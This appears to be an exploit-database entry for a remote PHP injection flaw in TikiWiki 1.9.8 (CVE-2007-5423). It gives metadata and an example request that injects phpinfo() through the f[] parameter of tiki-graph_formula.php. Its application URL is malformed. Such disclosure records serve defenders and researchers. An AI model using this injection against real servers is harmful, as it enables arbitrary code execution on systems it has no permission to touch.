[] NeoSense

TikiWiki 1.9.8 - Remote PHP Injection

Author: ShAnKaR
type: webapps
platform: php
port: 
date_added: 2007-10-09 
date_updated: 2016-10-19 
verified: 1 
codes: OSVDB-40478;CVE-2007-5423 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comtikiwiki-1.9.8.tar.gz

TikiWiki 1.9.8 Remote PHP Injection Vulnerability

Example: http:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

# milw0rm.com [2007-10-10]